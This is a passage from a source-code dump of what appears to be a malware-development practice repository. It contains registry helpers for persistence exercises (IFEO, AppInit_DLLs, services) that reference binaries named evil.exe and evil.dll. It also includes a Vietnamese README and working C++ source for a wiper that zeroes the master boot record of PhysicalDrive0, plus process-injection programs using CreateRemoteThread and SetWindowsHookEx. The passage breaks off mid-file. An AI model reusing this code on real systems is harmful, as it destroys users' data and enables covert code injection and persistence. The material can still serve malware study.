66 | BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData)
67 | {
68 | DWORD Ret;
69 | HKEY hKey;
70 | // Open the key
71 | Ret = RegOpenKeyEx(hKeyParent, subkey, 0, KEY_WRITE, &hKey);
72 | if (Ret == ERROR_SUCCESS) {
73 | if (ERROR_SUCCESS != RegSetValueEx(hKey, valueName, 0, REG_SZ, (LPBYTE)(strData), ((((DWORD)lstrlen(strData) + 1)) * 2))) {
74 | RegCloseKey(hKey);
75 | return FALSE;
76 | }
77 | RegCloseKey(hKey);
78 | return TRUE;
79 | }
80 | return FALSE;
81 | }
82 |
83 | BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD *readData)
84 | {
85 | HKEY hKey;
86 | DWORD Ret;
87 | // Check if the registry exists
88 | Ret = RegOpenKeyEx(hKeyParent, subkey, 0, KEY_READ, &hKey);
89 | if (Ret == ERROR_SUCCESS) {
90 | DWORD data;
91 | DWORD len = sizeof(DWORD); // size of data
92 | Ret = RegQueryValueEx(hKey, valueName, NULL, NULL, (LPBYTE)(&data), &len);
93 | if (Ret == ERROR_SUCCESS) {
94 | RegCloseKey(hKey);
95 | (*readData) = data;
96 | return TRUE;
97 | }
98 | RegCloseKey(hKey);
99 | return TRUE;
100 | }
101 | else {
102 | return FALSE;
103 | }
104 | }
105 |
106 | BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR *readData)
107 | {
108 | // Read customer infromation from the registry
109 | HKEY hKey;
110 | DWORD len = TOTAL_BYTES_READ;
111 | DWORD readDataLen = len;
112 | PWCHAR readBuffer = (PWCHAR)malloc(sizeof(PWCHAR)* len);
113 |
114 | if (readBuffer == NULL)
115 | return FALSE;
116 | // Check if the registry exists
117 | DWORD Ret = RegOpenKeyEx(hKeyParent, subkey, 0, KEY_READ, &hKey);
118 | if (Ret == ERROR_SUCCESS) {
119 | Ret = RegQueryValueEx(hKey, valueName, NULL, NULL, (BYTE*)readBuffer, &readDataLen);
120 | while (Ret == ERROR_MORE_DATA)
121 | {
122 | // Get a buffer that is big enough.
123 | len += OFFSET_BYTES;
124 | readBuffer = (PWCHAR)realloc(readBuffer, len);
125 | readDataLen = len;
126 | Ret = RegQueryValueEx(hKey, valueName, NULL, NULL, (BYTE*)readBuffer, &readDataLen);
127 | }
128 | if (Ret != ERROR_SUCCESS) {
129 | RegCloseKey(hKey);
130 | return FALSE;;
131 | }
132 | *readData = readBuffer;
133 | RegCloseKey(hKey);
134 | return TRUE;
135 | }
136 | else {
137 | return FALSE;
138 | }
139 | }
140 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_5_Persistence_IFEO/MyRegistry.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 | #include
5 |
6 | #define TOTAL_BYTES_READ 1024
7 | #define OFFSET_BYTES 1024
8 |
9 | BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
10 | BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
11 | BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
12 | BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD *readData);
13 | BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR *readData);
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_5_Persistence_IFEO/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_5_Persistence_IFEO/evil.exe
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_5_Persistence_IFEO/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Ex18_5_Persistence_IFEO.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/Ex18_6_Persistence_AppInit_DLLs.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/Ex18_6_Persistence_AppInit_DLLs.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/Ex18_6_Persistence_AppInit_DLLs.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/Ex18_6_Persistence_AppInit_DLLs.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/MyRegistry.c:
--------------------------------------------------------------------------------
1 | #include "MyRegistry.h"
2 |
3 | /*
4 | * Example to used:
5 | BOOL status;
6 | DWORD readData;
7 | PWCHAR readMessage = nullptr;
8 |
9 | status = CreateRegistryKey(HKEY_CURRENT_USER, "Aticleworld"); //create key
10 | if (status != TRUE) return FALSE;
11 |
12 | status = WriteDwordInRegistry(HKEY_CURRENT_USER, "Aticleworld","date",12082016); //write dword
13 | if (status != TRUE) return FALSE;
14 |
15 | status = readDwordValueRegistry(HKEY_CURRENT_USER, "Aticleworld", "date", &readData); //read dword
16 | if (status != TRUE) return FALSE;
17 | printf("%ld", readData);
18 |
19 | status = writeStringInRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", "Happy"); //write string
20 | if (status != TRUE) return FALSE;
21 |
22 | status = readUserInfoFromRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", &readMessage); //read string
23 | if (status != TRUE) return FALSE;
24 | if (readMessage != nullptr) {
25 | printf(" Message = %S\n", readMessage);
26 | free(readMessage);
27 | readMessage = nullptr;
28 | }
29 | */
30 |
31 | BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey)
32 | {
33 | DWORD dwDisposition; // It verify new key is created or open existing key
34 | HKEY hKey;
35 | DWORD Ret;
36 |
37 | Ret = RegCreateKeyEx(hKeyParent, subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition);
38 | if (Ret != ERROR_SUCCESS) {
39 | printf(" [-] Error Opening or Creating new key. Code = %d\n", GetLastError());
40 | return FALSE;
41 | }
42 | //close the key
43 | RegCloseKey(hKey);
44 | return TRUE;
45 | }
46 |
47 | BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data)
48 | {
49 | DWORD Ret;
50 | HKEY hKey;
51 | // Open the key
52 | Ret = RegOpenKeyEx(hKeyParent, subkey, 0, KEY_WRITE, &hKey);
53 | if (Ret == ERROR_SUCCESS) {
54 | // Set the value in key
55 | if (ERROR_SUCCESS != RegSetValueEx(hKey, valueName, 0, REG_DWORD, (LPBYTE)&data, sizeof(data))) {
56 | RegCloseKey(hKey);
57 | return FALSE;
58 | }
59 | // Close the key
60 | RegCloseKey(hKey);
61 | return TRUE;
62 | }
63 | return FALSE;
64 | }
65 |
66 | BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData)
67 | {
68 | DWORD Ret;
69 | HKEY hKey;
70 | // Open the key
71 | Ret = RegOpenKeyEx(hKeyParent, subkey, 0, KEY_WRITE, &hKey);
72 | if (Ret == ERROR_SUCCESS) {
73 | if (ERROR_SUCCESS != RegSetValueEx(hKey, valueName, 0, REG_SZ, (LPBYTE)(strData), ((((DWORD)lstrlen(strData) + 1)) * 2))) {
74 | RegCloseKey(hKey);
75 | return FALSE;
76 | }
77 | RegCloseKey(hKey);
78 | return TRUE;
79 | }
80 | return FALSE;
81 | }
82 |
83 | BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD *readData)
84 | {
85 | HKEY hKey;
86 | DWORD Ret;
87 | // Check if the registry exists
88 | Ret = RegOpenKeyEx(hKeyParent, subkey, 0, KEY_READ, &hKey);
89 | if (Ret == ERROR_SUCCESS) {
90 | DWORD data;
91 | DWORD len = sizeof(DWORD); // size of data
92 | Ret = RegQueryValueEx(hKey, valueName, NULL, NULL, (LPBYTE)(&data), &len);
93 | if (Ret == ERROR_SUCCESS) {
94 | RegCloseKey(hKey);
95 | (*readData) = data;
96 | return TRUE;
97 | }
98 | RegCloseKey(hKey);
99 | return TRUE;
100 | }
101 | else {
102 | return FALSE;
103 | }
104 | }
105 |
106 | BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR *readData)
107 | {
108 | // Read customer infromation from the registry
109 | HKEY hKey;
110 | DWORD len = TOTAL_BYTES_READ;
111 | DWORD readDataLen = len;
112 | PWCHAR readBuffer = (PWCHAR)malloc(sizeof(PWCHAR)* len);
113 |
114 | if (readBuffer == NULL)
115 | return FALSE;
116 | // Check if the registry exists
117 | DWORD Ret = RegOpenKeyEx(hKeyParent, subkey, 0, KEY_READ, &hKey);
118 | if (Ret == ERROR_SUCCESS) {
119 | Ret = RegQueryValueEx(hKey, valueName, NULL, NULL, (BYTE*)readBuffer, &readDataLen);
120 | while (Ret == ERROR_MORE_DATA)
121 | {
122 | // Get a buffer that is big enough.
123 | len += OFFSET_BYTES;
124 | readBuffer = (PWCHAR)realloc(readBuffer, len);
125 | readDataLen = len;
126 | Ret = RegQueryValueEx(hKey, valueName, NULL, NULL, (BYTE*)readBuffer, &readDataLen);
127 | }
128 | if (Ret != ERROR_SUCCESS) {
129 | RegCloseKey(hKey);
130 | return FALSE;;
131 | }
132 | *readData = readBuffer;
133 | RegCloseKey(hKey);
134 | return TRUE;
135 | }
136 | else {
137 | return FALSE;
138 | }
139 | }
140 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/MyRegistry.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 | #include
5 |
6 | #define TOTAL_BYTES_READ 1024
7 | #define OFFSET_BYTES 1024
8 |
9 | BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
10 | BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
11 | BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
12 | BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD *readData);
13 | BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR *readData);
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/evil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/evil.dll
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_6_Persistence_AppInit_DLLs/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Ex18_6_Persistence_AppInit_DLLs.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_7_Persistence_Windows_Service/Evil_WS.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_7_Persistence_Windows_Service/Evil_WS.exe
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_7_Persistence_Windows_Service/Ex18_7_Persistence_Windows_Service.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/lma-poc/msvc/Ex18_7_Persistence_Windows_Service/Ex18_7_Persistence_Windows_Service.rc
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_7_Persistence_Windows_Service/Ex18_7_Persistence_Windows_Service.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_7_Persistence_Windows_Service/Ex18_7_Persistence_Windows_Service.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex18_7_Persistence_Windows_Service/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Ex18_7_Persistence_Windows_Service.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex19_Simple_Windows_Service/Ex19_Simple_Windows_Service.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/lma-poc/msvc/Ex19_Simple_Windows_Service/Ex19_Simple_Windows_Service.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/mbr-overwriting/README.md:
--------------------------------------------------------------------------------
1 | ### 1. Master Boot Record - MBR
2 | - Là một cấu trúc dữ liệu quan trọng trên ổ đĩa cứng.
3 | - Sector này chứa mã thực thi (executable code), chữ ký (disk signature) và bảng thông tin về các phân vùng (partition table) trên ổ đĩa cứng.
4 | - Có kích thước là 512 bytes. Trong đó:
5 | + 444 bytes đầu là Master Boot Code (executable code)
6 | + 64 bytes tiếp theo là thông tin các phân vùng (partition table)
7 | + 2 bytes cuối là chữ ký, giá trị là: 0x55AA
8 |
9 | ### 2. Hoạt động của MBR
10 | - Hệ thống dựa vào cấu trúc dữ liệu này để tải các phân vùng có trên đĩa cứng.
11 | - Nếu là phân vùng Primary và được Active thì hệ điều hành sẽ trỏ tới file BootLoader để nạp OS có trên phân vùng này.
12 | - Đồng thời cũng tải những phân vùng Primary và Logical khác, như các phân vùng lưu dữ liệu (Không phải vùng cài OS).
13 |
14 | ### 3. Virus ghi đè MBR
15 | - Tạo dữ liệu trắng dùng hàm ZeroMemory(), gọi là đoạn dữ liệu tạm, sẽ dùng để ghi đoạn dữ liệu tạm này vào MBR
16 | ```
17 | char mbrData[MBR_SIZE];
18 | ZeroMemory(&mbrData, (sizeof mbrData));
19 | ```
20 |
21 | - Tiến hành tạo Handle Device của ổ cứng:
22 | ```
23 | HANDLE MasterBootRecord = CreateFile("\\\\.\\PhysicalDrive0"
24 | , GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE
25 | , NULL, OPEN_EXISTING, NULL, NULL);
26 | ```
27 |
28 | - Tiến hành việc ghi vào MBR:
29 | ```
30 | WriteFile(MasterBootRecord, mbrData, MBR_SIZE, &write, NULL)
31 | ```
32 |
33 | - Lúc này dữ liệu gốc trên Sector này bị đã bị đè, gây lỗi khởi động hệ điều hành.
34 |
35 | ### 4. Tham khảo
36 | - https://technet.microsoft.com/en-us/library/cc976786.aspx
37 | - https://www.bydavy.com/2012/01/lets-decrypt-a-master-boot-record/
--------------------------------------------------------------------------------
/mbr-overwriting/mbr-overwriting.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32519.379
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mbr-overwriting", "mbr-overwriting\mbr-overwriting.vcxproj", "{2B793CFC-E14A-44DA-8536-82698134178E}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {2B793CFC-E14A-44DA-8536-82698134178E}.Debug|x64.ActiveCfg = Debug|x64
17 | {2B793CFC-E14A-44DA-8536-82698134178E}.Debug|x86.ActiveCfg = Debug|Win32
18 | {2B793CFC-E14A-44DA-8536-82698134178E}.Release|x64.ActiveCfg = Release|x64
19 | {2B793CFC-E14A-44DA-8536-82698134178E}.Release|x64.Build.0 = Release|x64
20 | {2B793CFC-E14A-44DA-8536-82698134178E}.Release|x86.ActiveCfg = Release|Win32
21 | {2B793CFC-E14A-44DA-8536-82698134178E}.Release|x86.Build.0 = Release|Win32
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | GlobalSection(ExtensibilityGlobals) = postSolution
27 | SolutionGuid = {30719099-A375-496E-898A-7834F48CCF5C}
28 | EndGlobalSection
29 | EndGlobal
30 |
--------------------------------------------------------------------------------
/mbr-overwriting/mbr-overwriting/mbr-overwriting.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | using namespace std;
5 |
6 | #define MBR_SIZE 512
7 |
8 | int main()
9 | {
10 | DWORD write;
11 | char mbrData[MBR_SIZE];
12 | ZeroMemory(&mbrData, (sizeof mbrData));
13 |
14 | HANDLE MasterBootRecord = CreateFile(L"\\\\.\\PhysicalDrive0"
15 | , GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE
16 | , NULL, OPEN_EXISTING, NULL, NULL);
17 |
18 | if (WriteFile(MasterBootRecord, mbrData, MBR_SIZE, &write, NULL) == TRUE) {
19 | cout << "MBR is overwrite!";
20 | Sleep(3000);
21 | ExitProcess(0);
22 | }
23 | else {
24 | cout << "Fail to overwrite MBR";
25 | Sleep(3000);
26 | ExitProcess(0);
27 | }
28 |
29 | CloseHandle(MasterBootRecord);
30 |
31 | return EXIT_SUCCESS;
32 | }
33 |
34 | // VS: Project Property > Linker > Manifest File > UAC Execution Level: highestAvaiable
--------------------------------------------------------------------------------
/mbr-overwriting/mbr-overwriting/mbr-overwriting.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/mbr-overwriting/mbr-overwriting/mbr-overwriting.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/mbr-overwriting/release/x64/mbr-overwriting.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/mbr-overwriting/release/x64/mbr-overwriting.zip
--------------------------------------------------------------------------------
/process-injection/README.md:
--------------------------------------------------------------------------------
1 | ### Process Injection Techniques
2 | - https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
3 | - https://attack.mitre.org/techniques/T1055/
--------------------------------------------------------------------------------
/process-injection/code-cave-injection/code-cave-injection.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_WARNINGS
2 | #include
3 | #include
4 | #include
5 | using namespace std;
6 |
7 | /*
8 | ** Code Cave - Inject Function to a process
9 | ** - https://youtu.be/0NwlWaT9NEY
10 | */
11 |
12 | typedef int(__stdcall *__MessageBoxA)(HWND, LPCSTR, LPCSTR, UINT);
13 |
14 | class CaveData
15 | {
16 | public:
17 | char Message[512];
18 | char Title[256];
19 | DWORD FunctionAddr;
20 | };
21 |
22 | // Get process id
23 | DWORD GetProcessID(const char* procname)
24 | {
25 | PROCESSENTRY32 pe;
26 | HANDLE hSnap;
27 |
28 | pe.dwSize = sizeof(PROCESSENTRY32);
29 | hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
30 | if (Process32First(hSnap, &pe)) {
31 | do
32 | {
33 | if (strcmp(pe.szExeFile, procname) == 0)
34 | break;
35 | } while (Process32Next(hSnap, &pe));
36 | }
37 | return pe.th32ProcessID;
38 | }
39 |
40 | DWORD __stdcall RemoteThread(CaveData *caveData)
41 | {
42 | __MessageBoxA MsgBox = (__MessageBoxA)caveData->FunctionAddr;
43 | MsgBox(NULL, caveData->Message, caveData->Title, MB_ICONWARNING);
44 | return EXIT_SUCCESS;
45 | }
46 |
47 | int main(int argc, char const *argv[])
48 | {
49 | system("cls");
50 | char strTmp[256], ProcessName[256];
51 |
52 | // input process running
53 | cout << "Example: crackme, basecalc,..." << endl;
54 | cout << "Enter Process Name: "; rewind(stdin);
55 | cin.getline(strTmp, sizeof(strTmp));
56 | strcpy(ProcessName, strcat(strTmp, ".exe"));
57 |
58 | cout << "[ STARTING ] Inject Function To Another Process!" << endl;
59 |
60 | CaveData caveData;
61 | ZeroMemory(&caveData, sizeof(CaveData));
62 |
63 | // copy data
64 | strcpy(caveData.Message, "Hello Friend!! (o_O)");
65 | strcpy(caveData.Title, "Process Injection Techniques");
66 |
67 | // get address of MessageBoxA in "user32.dll"
68 | HINSTANCE hUserModule = LoadLibrary("user32.dll");
69 | if (!hUserModule)
70 | {
71 | cout << "[ ERROR ] Load Library" << endl;
72 | return 0;
73 | }
74 |
75 | caveData.FunctionAddr = (DWORD)GetProcAddress(hUserModule, "MessageBoxA");
76 | FreeLibrary(hUserModule);
77 |
78 | // open target process
79 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetProcessID(ProcessName));
80 | if (!hProcess)
81 | {
82 | cout << "[ ERROR ] Open Process" << endl;
83 | return 0;
84 | }
85 |
86 | // allocation
87 | LPVOID pRemoteThread = VirtualAllocEx(hProcess, NULL, sizeof(CaveData), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
88 |
89 | // write
90 | WriteProcessMemory(hProcess, pRemoteThread, (LPVOID)RemoteThread, sizeof(CaveData), 0);
91 |
92 | // cave code allocation
93 | CaveData *pData = (CaveData*)VirtualAllocEx(hProcess, NULL, sizeof(CaveData), MEM_COMMIT, PAGE_READWRITE);
94 |
95 | // write data
96 | WriteProcessMemory(hProcess, pData, &caveData, sizeof(CaveData), NULL);
97 |
98 | // create remote thread
99 | HANDLE hThread = CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, pData, 0, 0);
100 |
101 | // close thread handle
102 | CloseHandle(hThread);
103 |
104 | // free the now unused memory
105 | VirtualFreeEx(hProcess, pRemoteThread, sizeof(CaveData), MEM_RELEASE);
106 | CloseHandle(hProcess);
107 |
108 | cout << "[ OK ] Code Injection Successful...!" << endl;
109 | cout << "[ EXIT ] Press any key to exit." << endl;
110 |
111 | getchar();
112 | return 0;
113 | }
--------------------------------------------------------------------------------
/process-injection/hook-injection/hook-injection.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_WARNINGS
2 | #include
3 | #include
4 | #include
5 | using namespace std;
6 |
7 | /*
8 | ** Hook Injection Via Setwindowshookex
9 | ** Reference:
10 | ** [1] - https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
11 | ** [2] - http://www.rohitab.com/discuss/topic/43926-setwindowshookex-dll-injection-my-code-and-some-questions/
12 | ** [3] - https://attack.mitre.org/wiki/Technique/T1055
13 | */
14 |
15 | // Get The Process ID
16 | DWORD GetProcessID(const char* procname)
17 | {
18 | PROCESSENTRY32 pe;
19 | HANDLE hSnap;
20 |
21 | pe.dwSize = sizeof(PROCESSENTRY32);
22 | hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
23 | if (Process32First(hSnap, &pe)) {
24 | do
25 | {
26 | if (strcmp(pe.szExeFile, procname) == 0)
27 | break;
28 | } while (Process32Next(hSnap, &pe));
29 | }
30 | return pe.th32ProcessID;
31 | }
32 |
33 | int main(int argc, char const *argv[])
34 | {
35 | char ProcessName[512], dllPathTmp[512];
36 | cout << "Right click Taskbar > Task Manager > View Process running" << endl;
37 | cout << "Example: Base Calculator, CrackMe v1.0, HxD,..." << endl;
38 | cout << "Enter Process Name: "; rewind(stdin);
39 | cin.getline(ProcessName, sizeof(ProcessName));
40 |
41 | // DLL Path
42 | cout << "Enter DLL Path: ";
43 | cin.getline(dllPathTmp, sizeof(dllPathTmp));
44 |
45 | cout << "[ Starting ] Hook Injection Via Setwindowshookex" << endl;
46 |
47 | // Finding target window
48 | HWND hwnd = FindWindow(NULL, ProcessName);
49 | if (hwnd == NULL) {
50 | cout << "[ FAILED ] Could not find target window." << endl; return EXIT_FAILURE;
51 | }
52 |
53 | // Getting the thread of the window and the PID
54 | DWORD processID = NULL;
55 | DWORD threadID = GetWindowThreadProcessId(hwnd, &processID);
56 | if (threadID == NULL) {
57 | cout << "[ FAILED ] Could not get thread ID of the target window." << endl; return EXIT_FAILURE;
58 | }
59 |
60 | // Loading DLL
61 | HMODULE dll = LoadLibraryEx(dllPathTmp, NULL, DONT_RESOLVE_DLL_REFERENCES);
62 | if (dll == NULL) {
63 | cout << "[ FAILED ] The DLL could not be found." << endl; return EXIT_FAILURE;
64 | }
65 |
66 | // Getting exported function address: using GetProcAddress();
67 | HOOKPROC addr = (HOOKPROC)GetProcAddress(dll, "myFunction");
68 | if (addr == NULL) {
69 | cout << "[ FAILED ] The function was not found." << endl; return EXIT_FAILURE; return EXIT_FAILURE;
70 | }
71 |
72 | // Setting the hook in the hook chain
73 | // Or WH_KEYBOARD if you prefer to trigger the hook manually
74 | HHOOK handle = SetWindowsHookEx(WH_GETMESSAGE, addr, dll, threadID);
75 | if (handle == NULL) {
76 | cout << "[ FAILED ] Couldn't set the hook with SetWindowsHookEx." << endl; return EXIT_FAILURE;
77 | }
78 |
79 | // Triggering the hook
